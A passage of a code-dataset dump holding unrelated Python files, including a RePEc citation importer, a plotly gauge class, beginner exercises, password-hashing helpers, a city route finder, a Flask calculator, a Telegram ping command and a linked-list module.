line[br+1:].strip()\n\n if k.lower() == \"template-type\":\n is_article = True if v == \"ReDIF-Article 1.0\" else False\n\n if is_article:\n if k == \"Title\":\n paper.title = v\n elif k == \"Year\":\n paper.year = v\n elif k == \"Author-Name\":\n author = self.s.query(Author).filter(Author.name == v).first()\n if author is None:\n author = Author(name=v)\n paper.authors.append(author)\n elif k == \"Classification-JEL\":\n codes = {c.strip() for c in v.split(\", \")}\n for c in codes:\n if len(c) != 3:\n raise ValueError(\"Not a 3-letter code\")\n jel = self.s.query(JEL).filter(JEL.code == c).first()\n if jel is None:\n jel = JEL(code=c)\n paper.jel.append(jel)\n elif k == \"Handle\":\n paper.handle = v\n # TODO is this check necessary?\n # paper_exists = self.s.query(Paper).filter(Paper.handle==paper.handle).first()\n # if paper_exists is not None:\n # paper =\n if len(paper.authors) == 0:\n raise ImportError(\"An article with empty authors:\", paper.handle)\n self.s.add(paper)\n self.s.commit()\n print(\"Paper added:\", paper.handle)\n paper = Paper()\n\n\n def import_all(self, file, n=0):\n rfs = RFS(REPEC_OPT_DIR)\n if n == 0:\n for file in rfs.realpaths():\n self.import_rdf(file)\n else:\n for i, file in enumerate(rfs.realpaths(), start=1):\n self.import_rdf(file)\n if i >= n: break\n print(\"Importing is completed\")\n\n\ndef main():\n if REPECI_MODE == \"use\":\n use()\n elif REPECI_MODE == \"create\":\n create()\n\n\ndef use():\n db = DB()\n G = db.ref_graph()\n rm = db.ref_metrics(G)\n print(rm.info(), rm.describe())\n db.s.close()\n\n\ndef create():\n if RECREATE_DB:\n try:\n os.remove(REPECI_DB)\n print(\"File removed:\", REPECI_DB)\n except FileNotFoundError:\n if str(input(\"File not found. Continue with a new one? 
[y/n] \")) == \"n\":\n return None\n except OSError as e:\n print(\"Failed with:\", e.strerror)\n print(\"Error code:\", e.code)\n db = DB()\n\n s = time.perf_counter()\n db.import_all(REPEC_OPT_DIR, n=RDF_MAX)\n e = time.perf_counter()\n print(\"%d rdf files have been imported in %d seconds\" % (RDF_MAX, round(e - s, 1)))\n\n s = time.perf_counter()\n db.import_refs(REPEC_REFS_FILE, n=REFS_MAX)\n e = time.perf_counter()\n print(\"%d reference nodes have been imported in %d seconds\" % (REFS_MAX, round(e - s, 1)))\n\n db.s.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"antontarasenko/repeci","sub_path":"repeci/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":11916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8361779568","text":"from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType\nimport copy as _copy\n\n\nclass Bar(_BaseTraceHierarchyType):\n\n # class properties\n # --------------------\n _parent_path_str = \"indicator.gauge\"\n _path_str = \"indicator.gauge.bar\"\n _valid_props = {\"color\", \"line\", \"thickness\"}\n\n # color\n # -----\n @property\n def color(self):\n \"\"\"\n Sets the background color of the arc.\n\n The 'color' property is a color and may be specified as:\n - A hex string (e.g. '#ff0000')\n - An rgb/rgba string (e.g. 'rgb(255,0,0)')\n - An hsl/hsla string (e.g. 'hsl(0,100%,50%)')\n - An hsv/hsva string (e.g. 'hsv(0,100%,100%)')\n - A named CSS color:\n aliceblue, antiquewhite, aqua, aquamarine, azure,\n beige, bisque, black, blanchedalmond, blue,\n blueviolet, brown, burlywood, cadetblue,\n chartreuse, chocolate, coral, cornflowerblue,\n cornsilk, crimson, cyan, darkblue, darkcyan,\n darkgoldenrod, darkgray, darkgrey, darkgreen,\n darkkhaki, darkmagenta, darkolivegreen, darkorange,\n darkorchid, darkred, darksalmon, darkseagreen,\n darkslateblue, darkslategray, darkslategrey,\n darkturquoise, darkviolet, deeppink, deepskyblue,\n dimgray, dimgrey, dodgerblue, firebrick,\n floralwhite, forestgreen, fuchsia, gainsboro,\n ghostwhite, gold, goldenrod, gray, grey, green,\n greenyellow, honeydew, hotpink, indianred, indigo,\n ivory, khaki, lavender, lavenderblush, lawngreen,\n lemonchiffon, lightblue, lightcoral, lightcyan,\n lightgoldenrodyellow, lightgray, lightgrey,\n lightgreen, lightpink, lightsalmon, lightseagreen,\n lightskyblue, lightslategray, lightslategrey,\n lightsteelblue, lightyellow, lime, limegreen,\n linen, magenta, maroon, mediumaquamarine,\n mediumblue, mediumorchid, mediumpurple,\n mediumseagreen, mediumslateblue, mediumspringgreen,\n mediumturquoise, mediumvioletred, midnightblue,\n mintcream, mistyrose, moccasin, navajowhite, navy,\n oldlace, olive, olivedrab, orange, orangered,\n orchid, palegoldenrod, palegreen, paleturquoise,\n palevioletred, papayawhip, peachpuff, peru, pink,\n plum, powderblue, purple, red, rosybrown,\n royalblue, rebeccapurple, saddlebrown, salmon,\n sandybrown, seagreen, seashell, sienna, silver,\n skyblue, slateblue, slategray, slategrey, snow,\n springgreen, steelblue, tan, teal, thistle, tomato,\n turquoise, violet, wheat, white, whitesmoke,\n yellow, yellowgreen\n\n Returns\n -------\n str\n \"\"\"\n return self[\"color\"]\n\n @color.setter\n def color(self, val):\n self[\"color\"] = val\n\n # line\n # ----\n @property\n def line(self):\n \"\"\"\n The 'line' property is an instance of Line\n that may be specified as:\n - An instance of :class:`plotly.graph_objs.indicator.gauge.bar.Line`\n - A dict of string/value properties that will be passed\n to the Line constructor\n\n Supported dict properties:\n\n color\n Sets the color of the line enclosing each\n sector.\n width\n Sets the width (in px) of the line enclosing\n each sector.\n\n Returns\n -------\n plotly.graph_objs.indicator.gauge.bar.Line\n \"\"\"\n return self[\"line\"]\n\n @line.setter\n def line(self, val):\n self[\"line\"] = val\n\n # thickness\n # ---------\n @property\n def thickness(self):\n \"\"\"\n Sets the thickness of the bar as a fraction of the total\n thickness of the gauge.\n\n The 'thickness' property is a number and may be specified as:\n - An int or float in the interval [0, 1]\n\n Returns\n -------\n int|float\n \"\"\"\n return self[\"thickness\"]\n\n @thickness.setter\n def thickness(self, val):\n 
self[\"thickness\"] = val\n\n # Self properties description\n # ---------------------------\n @property\n def _prop_descriptions(self):\n return \"\"\"\\\n color\n Sets the background color of the arc.\n line\n :class:`plotly.graph_objects.indicator.gauge.bar.Line`\n instance or dict with compatible properties\n thickness\n Sets the thickness of the bar as a fraction of the\n total thickness of the gauge.\n \"\"\"\n\n def __init__(self, arg=None, color=None, line=None, thickness=None, **kwargs):\n \"\"\"\n Construct a new Bar object\n\n Set the appearance of the gauge's value\n\n Parameters\n ----------\n arg\n dict of properties compatible with this constructor or\n an instance of\n :class:`plotly.graph_objs.indicator.gauge.Bar`\n color\n Sets the background color of the arc.\n line\n :class:`plotly.graph_objects.indicator.gauge.bar.Line`\n instance or dict with compatible properties\n thickness\n Sets the thickness of the bar as a fraction of the\n total thickness of the gauge.\n\n Returns\n -------\n Bar\n \"\"\"\n super(Bar, self).__init__(\"bar\")\n\n if \"_parent\" in kwargs:\n self._parent = kwargs[\"_parent\"]\n return\n\n # Validate arg\n # ------------\n if arg is None:\n arg = {}\n elif isinstance(arg, self.__class__):\n arg = arg.to_plotly_json()\n elif isinstance(arg, dict):\n arg = _copy.copy(arg)\n else:\n raise ValueError(\n \"\"\"\\\nThe first argument to the plotly.graph_objs.indicator.gauge.Bar\nconstructor must be a dict or\nan instance of :class:`plotly.graph_objs.indicator.gauge.Bar`\"\"\"\n )\n\n # Handle skip_invalid\n # -------------------\n self._skip_invalid = kwargs.pop(\"skip_invalid\", False)\n self._validate = kwargs.pop(\"_validate\", True)\n\n # Populate data dict with properties\n # ----------------------------------\n _v = arg.pop(\"color\", None)\n _v = color if color is not None else _v\n if _v is not None:\n self[\"color\"] = _v\n _v = arg.pop(\"line\", None)\n _v = line if line is not None else _v\n if _v is not None:\n self[\"line\"] = _v\n _v = arg.pop(\"thickness\", None)\n _v = thickness if thickness is not None else _v\n if _v is not None:\n self[\"thickness\"] = _v\n\n # Process unknown kwargs\n # ----------------------\n self._process_kwargs(**dict(arg, **kwargs))\n\n # Reset skip_invalid\n # ------------------\n self._skip_invalid = False\n","repo_name":"plotly/plotly.py","sub_path":"packages/python/plotly/plotly/graph_objs/indicator/gauge/_bar.py","file_name":"_bar.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","stars":14438,"dataset":"github-code","pt":"3"}
+{"seq_id":"29748307234","text":"#7-1\ncar=input(\"Which car do you want to rent: \")\nprint(\"Let me see if I can find you a \" + car +\".\")\n\n#7-2\nsize=input(\"Please tell me how many of you have a dinner: \")\nsize=int(size)\nif size>8:\n print(\"Sorry, no fit table.\")\nelse:\n print(\"There is free table.\")\n\n#7-3\nnumber=input(\"Please input a number: \")\nnumber=int(number)\nif number%10==0:\n print(\"It's 10's times.\")\nelse:\n print(\"It isn't 10's times.\")\n\n#7-4\\7-6\n#active出口\nprompt=\"Please input pei liao(Input 'quit' to end the program): \"\nactive=True\nwhile active:\n pl=input(prompt)\n if pl==\"quit\":\n active=False\n else:\n print(\"We'll add \"+ pl +\".\")\n#while条件测试出口\nprompt=\"Please input pei liao(Input 'quit' to end the program): \"\npl=\"\"\nwhile pl!=\"quit\":\n pl=input(prompt)\n if pl!=\"quit\":\n print(\"We'll add \"+ pl +\".\")\n#break出口\nprompt=\"Please input pei liao(Input 'quit' to end the program): \"\nwhile True:\n pl=input(prompt)\n if pl==\"quit\":\n break\n else:\n print(\"We'll add \"+ pl +\".\")\n#7-5\\7-6\n#break出口\nprompt=\"Please input your age(Input 'quit' to end): \"\nwhile True:\n age=input(prompt)\n if age==\"quit\":\n break\n else:\n age=int(age)\n if age<3:\n price=\"free\"\n elif age<=12:\n price=\"10 dollars\"\n else:\n price=\"15 dollars\"\n print(price)\n#while条件测试出口\nprompt=\"Please input your age(Input 'quit' to end): \"\nage=\"\"\nwhile age!=\"quit\":\n age=input(prompt)\n if age!=\"quit\":\n age=int(age)\n if age<3:\n price=\"free\"\n elif age<=12:\n price=\"10 dollars\"\n else:\n price=\"15 dollars\"\n print(price)\n#active出口\nprompt=\"Please input your age(Input 'quit' to end): \"\nactive=True\nwhile active:\n age=input(prompt)\n if age==\"quit\":\n active=False\n else:\n age=int(age)\n if age<3:\n price=\"free\"\n elif age<=12:\n price=\"10 dollars\"\n else:\n price=\"15 dollars\"\n print(price)\n\n#7-7 Ctrl+C退出循环 \n \n#7-8\nsandwich_orders=[\"a-sandwich\",\"b-sandwich\",\"c-sandwich\"]\nfinished_sandwiches=[]\nwhile sandwich_orders:\n sandwich=sandwich_orders.pop()\n print(\"I made your \" +sandwich +\".\")\n finished_sandwiches.append(sandwich)\nprint(\"---All sandwiches have been finished:---\")\nfor sandwich in finished_sandwiches:\n print(\"\\t\"+sandwich)\n \n#7-9\nsandwich_orders1=[\"c-sandwich\",\"b-sandwich\",\"c-sandwich\",\n \"pastrami\",\"pastrami\",\"pastrami\"]\nfinished_sandwiches1=[]\nprint(\"Sorry,Pastrami has been sold out!\")\nwhile \"pastrami\" in sandwich_orders1:\n sandwich_orders1.remove(\"pastrami\")\nprint(sandwich_orders1)\n\n#7-10\npoll={}\nactive=True\nwhile active:\n name=input(\"Input your name: \")\n place=input(\"If you could visit one place in the world, where would you go? \")\n poll[name]=place\n response=input(\"Continue?(yes/no): \")\n if response==\"no\":\n active=False\n\nprint(\"\\n---All poll results as follows---\")\nfor n,p in poll.items():\n print(n.title()+ \" dreams of visiting \" + p.title() + \".\")\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"cxd375727676/from_introduction_to_practice","sub_path":"mycodes/chapter7.py","file_name":"chapter7.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8218808681","text":"#!/usr/bin/python3\n\n#prompt use to enter a number\n\nnum = input('Please enter a number betweeen 1 and 9: ')\n\nnum = int(num)\n\n#check the number is within the range\n\nif (num >= 1) and (num <=9 ):\n\n print(f'Your guessed of is {num} right')\n \nelse:\n print(f'{num} is out of range,, please try again')\n","repo_name":"nguredavid/learnpython","sub_path":"test/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35954903715","text":"import binascii\nimport hashlib\nimport os\nfrom typing import Optional\n\n\nBYTES_COUNT: int = 60\nSHA_ITER_COUNT: int = 100000\nHASH_FUNC: str = \"sha512\"\n\n\ndef get_random_bytes(count: int = BYTES_COUNT) -> bytes:\n \"\"\"\n Return count of random bytes.\n\n :param count: Count of bytes\n :type count: int\n :return: Random bytes\n :rtype: bytes\n \"\"\"\n\n return os.urandom(count)\n\n\ndef generate_salt(random_bytes: Optional[bytes] = None) -> bytes:\n \"\"\"\n Generate hash salt.\n\n :param random_bytes: Random bytes for salting\n :type random_bytes: Optional[bytes]\n :return: Salted bytes\n :rtype: bytes\n \"\"\"\n\n random_bytes = get_random_bytes() if random_bytes is None else random_bytes\n\n return hashlib.sha256(random_bytes).hexdigest().encode(\"ascii\")\n\n\ndef hash_string(\n string: str,\n *,\n salt: Optional[bytes] = None,\n sha_iter_count: int = SHA_ITER_COUNT,\n hash_func: str = HASH_FUNC\n) -> str:\n \"\"\"\n Hash string by input parameters.\n\n :param string: String to be hashed\n :type string: str\n :param salt: Salt for hashing\n :type salt: Optional[bytes]\n :param sha_iter_count: Count of hashing iterations\n :type sha_iter_count: int\n :param hash_func: Function for hashing\n :type hash_func: str\n :return: Hashed string\n :rtype: str\n \"\"\"\n\n salt = generate_salt() if salt is None else salt\n\n hashed_string = hashlib.pbkdf2_hmac(\n hash_func, string.encode(\"utf-8\"), salt, sha_iter_count\n )\n hashed_string = binascii.hexlify(hashed_string)\n\n return (salt + hashed_string).decode(\"ascii\")\n","repo_name":"MehdiMJ1/aioinsta","sub_path":"api/utils/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"16395693140","text":"import pandas as pd\nimport os\nfrom os import listdir\nimport numpy as np\nimport json\nimport ast\n\ndir = \"/scratch/nvw224/videos_new/\" # \"/Volumes/Backup/umpeval/MIL/2017/\" #\nv = \"CENTERFIELD\"\nsavename = \"ATL_CF_metadata.csv\"\n\nstart = True\ncenter_field_dic = {}\nmonths = listdir(dir)\nfor month in months:\n days = listdir(os.path.join(dir, month))\n print(days)\n for day in days:\n nr = listdir(os.path.join(dir, month, day))[0]\n cf = listdir(os.path.join(dir, month, day, nr, v))\n for files in cf:\n if files[-4:]==\".dat\":\n name = files.split(\".\")[0]\n for i in open(os.path.join(dir, month, day, nr, v, files)).readlines():\n datContent=ast.literal_eval(i)\n if start:\n d = {}\n for k in list(datContent.keys()):\n d[k] = [datContent[k]]\n d[\"play_id\"] = [name]\n start = False\n print(d)\n else:\n for k in list(d.keys()):\n if k == \"play_id\":\n d[k].append(name)\n else:\n try:\n d[k].append(datContent[k])\n except KeyError:\n d[k].append(np.nan)\n print(k)\n continue\n\ndf = pd.DataFrame(data=d)\nnew_df = df.rename(columns = {\"pitch_type\": \"Pitch Type\"})\nnew_df.to_csv(savename)\n\n# TO CONVERT TO CSV AFTERWARDS:\n#with open(\"/scratch/nvw224/pitch_type/Pose_Estimation/release_frame_boston.json\", \"w\") as outfile:\n# json.dump(center_field_dic, outfile)\n# a = list(center_field_dic.keys())\n# b = np.zeros(len(a))\n# i=0\n# for play in a:\n# b[i]=center_field_dic[play]\n# i+=1\n#\n# d = {\"play_id\":a, column:b}\n","repo_name":"NinaWie/pitch_type","sub_path":"utils_filtering/dat_files_labels_to_csv.py","file_name":"dat_files_labels_to_csv.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"}
+{"seq_id":"26500247904","text":"# -*- encoding: utf-8 -*-\n'''\n@File : 9-9.py\n@Time : 06/11/2022, 12:20:47\n@Author : Antti Hakkarainen\n@Student : K79735\n@Contact : antti.i.hakkarainen@tuni.fi\n@Course : COMP.CS.100 Ohjelmointi 1.\n@Desc : TEMP\n'''\n\nCITY_PRINT_WIDTH:int = 14\nDIST_PRINT_WIDTH:int = 5\n\ndef print_destinations(distances:dict, city:str) -> None:\n \"\"\"\n Print destinations of a city\n\n :param dict distances:\n :param str city:\n \"\"\"\n \n for dest in sorted(distances[city]): \n print(f'{city: <{CITY_PRINT_WIDTH}}' + \n f'{dest: <{CITY_PRINT_WIDTH}}' + \n f'{distances[city][dest]: >{DIST_PRINT_WIDTH}}')\n\ndef read_distance_file(filename:str) -> list:\n \"\"\"\n Reads rows from file to list\n \n param : str, filename from user\n return: list, rows from read file (or empty list if none was read)\n \"\"\"\n \n try:\n with open (filename, \"r\", encoding=\"utf-8\") as read_file:\n rows:list = read_file.readlines() \n read_file.close()\n except OSError:\n print(f\"Error: '{filename}' can not be read.\")\n return []\n \n return rows\n\ndef add_rows_to_dict(rows:list) -> dict:\n \"\"\"\n Adds read rows to dict\n \n param : list, of rows read from file\n return: dict, distances[city:str][destination:str] = distance:int\n \"\"\"\n \n distances:dict = {}\n\n for row in rows: \n split_row = row.strip().split(\";\")\n if len(split_row) != 3:\n print(\"Error: Too many or too few entries in a row:\")\n print(row)\n return {}\n \n city:str = split_row[0]\n dest:str = split_row[1]\n dist:int = int(split_row[2])\n \n if len(city) == 0 or len(dest) == 0:\n print(\"Error: Bad data in file.\")\n return {}\n\n if city not in distances:\n distances[city] = {dest: dist}\n else: \n distances[city].update({dest: dist}) \n \n return distances\n\ndef add_key_value_pair(distances:dict) -> None:\n \"\"\"\n Adds connection to dict\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n dest:str = input(\"Enter destination city: \")\n try:\n temp:str = (input(\"Distance: \"))\n dist:int = int(temp)\n except ValueError:\n print(f\"Error: '{temp}' is not an integer.\")\n return\n \n if city not in distances:\n distances[city] = {dest: dist} \n else: \n distances[city].update({dest: dist}) \n \n if dest not in distances:\n distances[dest] = {}\n \ndef remove_key_value_pair(distances:dict) -> None:\n \"\"\"\n Removes connection from dict\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n if city not in distances: \n print(f\"Error: '{city}' is unknown.\") \n return\n \n dest:str = input(\"Enter destination city: \")\n if dest in distances[city]:\n distances[city].pop(dest)\n else:\n print(f\"Error: missing road segment between '{city}' and '{dest}'.\")\n \ndef print_neighbours(distances:dict) -> None:\n \"\"\"\n Lists neighbours of a city\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n if city not in distances: \n print(f\"Error: '{city}' is unknown.\") \n return\n \n print_destinations(distances, city)\n \ndef fetch_neighbours(distances:dict, city:str) -> list:\n \"\"\"\n Returns a list of all the cities that are directly connected to city.\n \n :param data: dict, distance information between the known cities.\n :param city: str, the name of the city whose neighbours we\n are interested in.\n :return: list[str], the neighbouring city names in a list.\n \"\"\"\n \n neighbours:list = []\n \n if city in distances:\n for dest 
in distances[city]:\n neighbours.append(dest)\n \n return neighbours\n\ndef distance_to_neighbour(distances:dict, city:str, dest:str):\n \"\"\"\n Returns the distance between two neighbouring cities. \n \n :param data: dict, distance information between the known cities.\n :param departure: str, the name of the departure city.\n :param destination: str, the name of the destination city.\n :return: int | None, The distance between and\n . None if there is no direct connection\n between the two cities.\n \"\"\"\n \n if city in distances:\n if dest in distances[city]:\n return distances[city][dest]\n \n return None\n \ndef print_route(distances:dict) -> None:\n \"\"\"\n Prints route from city to dest\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n if city not in distances:\n print(f\"Error: '{city}' is unknown.\")\n return\n dest:str = input(\"Enter destination city: \") \n \n # uses premade algo to find route \n route = find_route(distances, city, dest)\n \n # no route\n if len(route) == 0: \n print(f\"No route found between '{city}' and '{dest}'.\")\n # 2 cities long route\n elif len(route) == 2:\n # same city and dest?\n if route[0] == route[1]:\n print(f\"{route[0]}-{route[1]} (0 km)\")\n # different cities\n else:\n print(f\"{route[0]}-{route[1]} ({distances[route[0]][route[1]]} km)\")\n # otherwise prints a long route\n else:\n route_str:str = \"\"\n route_len:int = 0\n route_stops:int = len(route)\n i:int = 0\n \n while i < route_stops:\n if i < route_stops-1: \n route_len += distances[route[i]][route[i+1]]\n route_str += f\"{route[i]}-\"\n i += 1\n \n print(route_str.rstrip('-') + f\" ({str(route_len)} km)\") \n\ndef menu(distances:dict) -> None:\n \"\"\"\n Displays a python 3.6 compatible menu for user\n \n param : dict, of connections\n return: none\n \"\"\"\n \n while True:\n cmd = input(\"Enter action> \")\n \n if cmd == \"display\":\n for city in sorted(distances):\n print_destinations(distances, city) \n elif cmd == \"add\":\n add_key_value_pair(distances)\n elif cmd == \"remove\":\n remove_key_value_pair(distances)\n elif cmd == \"neighbours\":\n print_neighbours(distances)\n elif cmd == \"route\":\n print_route(distances)\n elif cmd == \"\":\n print(\"Done and done!\")\n return None\n else:\n print(f\"Error: unknown action '{cmd}'.\") \n \"\"\"\n rip no python 3.10 :'(\n match cmd:\n case \"display\":\n display(distances)\n case \"add\":\n add_key_value_pair(distances)\n case \"remove\":\n remove_key_value_pair(distances)\n case \"neighbours\":\n list_neighbours(distances)\n case \"route\":\n get_route(distances)\n case \"\":\n print(\"Done and done!\")\n return None\n case _:\n print(f\"Error: unknown action '{cmd}'.\") \n \"\"\"\n \ndef find_route(data, departure, destination):\n \"\"\"\n This function tries to find a route between \n and cities. It assumes the existence of\n the two functions fetch_neighbours and distance_to_neighbour\n (see the assignment and the function templates below).\n They are used to get the relevant information from the data\n structure for find_route to be able to do the search.\n\n The return value is a list of cities one must travel through\n to get from to . 
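The search below is a uniform-cost (Dijkstra-style) expansion: 'greens' holds the\n    settled cities, 'deltas' the best known distances so far, and 'came_from' the\n    predecessor links used to reconstruct the route.\n    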
If for any\n reason the route does not exist, the return value is\n an empty list [].\n\n :param: dict, of connections\n :param departure: str, the name of the departure city.\n :param destination: str, the name of the destination city.\n :return: list[str], a list of cities the route travels through, or\n an empty list if the route can not be found. If the departure\n and the destination cities are the same, the function returns\n a two element list where the departure city is stores twice.\n \"\"\"\n\n if departure not in data:\n return []\n\n elif departure == destination:\n return [departure, destination]\n\n greens = {departure}\n deltas = {departure: 0}\n came_from = {departure: None}\n\n while True:\n if destination in greens:\n break\n\n red_neighbours = []\n for city in greens:\n for neighbour in fetch_neighbours(data, city):\n if neighbour not in greens:\n delta = deltas[city] + distance_to_neighbour(data, city, neighbour)\n red_neighbours.append((city, neighbour, delta))\n\n if not red_neighbours:\n return []\n\n current_city, next_city, delta = min(red_neighbours, key=lambda x: x[2])\n\n greens.add(next_city)\n deltas[next_city] = delta\n came_from[next_city] = current_city\n\n route = []\n while True:\n route.append(destination)\n if destination == departure:\n break\n destination = came_from.get(destination)\n\n return list(reversed(route))\n\ndef main():\n filename = input(\"Enter input file name: \")\n rows = read_distance_file(filename)\n \n # exit prog if nothing was read\n if len(rows) == 0:\n return 0 \n \n # exit prog if data was invalid\n dist = add_rows_to_dict(rows)\n if len(dist) == 0:\n return 0\n \n menu(dist)\n \n \"\"\"\n import pprint\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(dist)\n \"\"\"\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ahakkar/ohj1","sub_path":"9-0-0/9-9.py","file_name":"9-9.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"707341522","text":"from copy import deepcopy\n\nwith open('input', 'r') as f:\n data = f.read().split('\\n\\n')\n\n\ndef rotate(a):\n b = []\n for i in range(len(a[0])):\n b.append([])\n for i in a:\n for j,k in enumerate(i):\n b[j].insert(0,k)\n return b\n\ndata[0], number = data[0].split(' 1')\n\n\nstacks = []\nstack = []\nfor i, j in enumerate(data[0]):\n if j == '\\n':\n stacks.append(stack)\n stack = []\n elif i%4 == 1:\n stack.append(j)\n\nstacks = rotate(stacks)\n\nnew_stacks = []\nfor i in range(len(stacks)):\n st = []\n for j in range(len(stacks[0])):\n if stacks[i][j] != ' ':\n st.append(stacks[i][j])\n new_stacks.append(st[:])\n\ntask1 = deepcopy(new_stacks)\ntask2 = deepcopy(new_stacks)\n\n\n#taks1 + task2\nfor i in data[1].split('\\n'):\n z = list(map(int,i.replace('move','').replace(' from ',' ').replace(' to ',' ').split()))\n y = [] #task2\n for j in range(z[0]):\n x = task1[z[1]-1].pop() #task1\n task1[z[2]-1].append(x) #task1\n\n y.insert(0, task2[z[1]-1].pop()) #task2\n task2[z[2]-1].extend(y[:]) #task2\n \n \n\nfor i in task1:\n print(i[-1], end='')\nprint()\n\n\nfor i in task2:\n print(i[-1], end='')\nprint()","repo_name":"zorell11/advent-of-code-2022","sub_path":"05/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19806704764","text":"from flask import Flask, render_template,request,flash\napp=Flask(__name__)\n \n@app.route('/')\ndef entry_page():\n return render_template('home.html',page_title='Welcome to tiny-miny Einstein Project')\n\n@app.route('/h')\ndef entry_page1():\n return render_template('home1.html',page_title='Welcome to tiny-miny Einstein Project')\n\n\n\n\n@app.route('/sum',methods=['POST'])\ndef sum():\n x=int(request.form['firstValue'])\n y=int(request.form['secondValue'])\n return render_template('sum.html',page_title='Calculation result',sum_result=(x+y),first_value=x,second_value=y)\n \n@app.route('/minus',methods=['POST'])\ndef minus():\n x=int(request.form['firstValue'])\n y=int(request.form['secondValue'])\n return render_template('minus.html',page_title='Calculation result',sum_result1=(x-y),first_value=x,second_value=y)\n \n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Aydawka/calculation-via-python-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"31410229583","text":"import time\nfrom datetime import datetime\nfrom thebot import dankbot\nfrom pyrogram.types import Message\nfrom pyrogram import filters\nfrom thebot import StartTime\ndef get_readable_time(seconds: int) -> str:\n count = 0\n ping_time = \"\"\n time_list = []\n time_suffix_list = [\"s\", \"m\", \"h\", \"days\"]\n while count < 4:\n count += 1\n remainder, result = divmod(seconds, 60) if count < 3 else divmod(seconds, 24)\n if seconds == 0 and remainder == 0:\n break\n time_list.append(int(result))\n seconds = int(remainder)\n for x in range(len(time_list)):\n time_list[x] = str(time_list[x]) + time_suffix_list[x]\n if len(time_list) == 4:\n ping_time += time_list.pop() + \", \"\n time_list.reverse()\n ping_time += \":\".join(time_list)\n return ping_time\n\n@dankbot.on_message(~filters.me & filters.command('ping', prefixes='/'), group=8)\nasync def ping_bot(_, message):\n start_time = time.time()\n m = await message.reply_text(\"Pinging...\")\n end_time = time.time()\n ping_time = round((end_time - start_time) * 1000, 3)\n uptime = get_readable_time((time.time() - StartTime))\n await m.edit_text(f\"**EsseX replied in:** `{ping_time}ms`\\n**EsseX uptime:** {uptime}\", parse_mode='markdown')\n\n","repo_name":"Dank-del/EsseX","sub_path":"thebot/modules/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"3"}
+{"seq_id":"25438846535","text":"from . import Node\n\nclass LinkedList:\n '''\n Linked Lists are a sequence of nodes.\n It starts with a head, and can be uni o bidirectional,\n - get_head_node returns where the linked list starts.\n - insert_beginning first instanciate a new node and then links it to the current head_node,\n consecuently after setting the new node as head node it becomes the first node in the linked list\n without losing any information.\n - stringify_list shows the values from each node in the linked list\n - remove_node remove a node by it's value\n '''\n def __init__(self, value=None):\n self.head_node = Node(value)\n\n def get_head_node(self):\n return self.head_node\n\n def insert_beginning(self, new_value):\n new_node = Node(new_value)\n new_node.set_next_node(self.head_node)\n self.head_node = new_node\n\n def stringify_list(self):\n string_list = \"\"\n current_node = self.get_head_node()\n while current_node:\n if current_node.get_value() != None:\n string_list += f'{current_node.get_value()}'\n current_node = current_node.get_next_node()\n return string_list\n \n def remove_node(self, value_to_remove):\n current_node = self.head_node\n \n if current_node.get_value() == value_to_remove:\n self.head_node = current_node.get_next_node()\n else:\n while current_node:\n next_node = current_node.get_next_node() \n if next_node.get_value() == value_to_remove:\n current_node.set_next_node(next_node.get_next_node())\n current_node = None\n else:\n current_node = next_node\n\n'''\nSwapping elements in a linked list\n'''\n\ndef swap_nodes(input_list, val1, val2):\n print(f'Swapping {val1} with {val2}')\n\n node1_prev = None\n node2_prev = None\n node1 = input_list.head_node\n node2 = input_list.head_node\n\n if val1 == val2:\n print(\"Elements are the same - no swap needed\")\n return\n\n while node1 is not None:\n if node1.get_value() == val1:\n break\n node1_prev = node1\n node1 = node1.get_next_node()\n\n while node2 is not None:\n if node2.get_value() == val2:\n break\n node2_prev = node2\n node2 = node2.get_next_node()\n\n if (node1 is None or node2 is None):\n print(\"Swap not possible - one or more element is not in the list\")\n return\n\n if node1_prev is None:\n input_list.head_node = node2\n else:\n node1_prev.set_next_node(node2)\n\n if node2_prev is None:\n input_list.head_node = node1\n else:\n node2_prev.set_next_node(node1)\n\n temp = node1.get_next_node()\n node1.set_next_node(node2.get_next_node())\n node2.set_next_node(temp)\n\n\n'''\nTwo Pointer Moving in parallel\n'''\n\ndef nth_last_node(linked_list, n):\n current = None\n tail_seeker = linked_list.head_node\n count = 1\n while tail_seeker:\n tail_seeker = tail_seeker.get_next_node()\n count += 1\n if count >= n + 1:\n if current is None:\n current = linked_list.head_node\n else:\n current = current.get_next_node()\n return current\n\n '''\n Pointers moving at different speeds\n 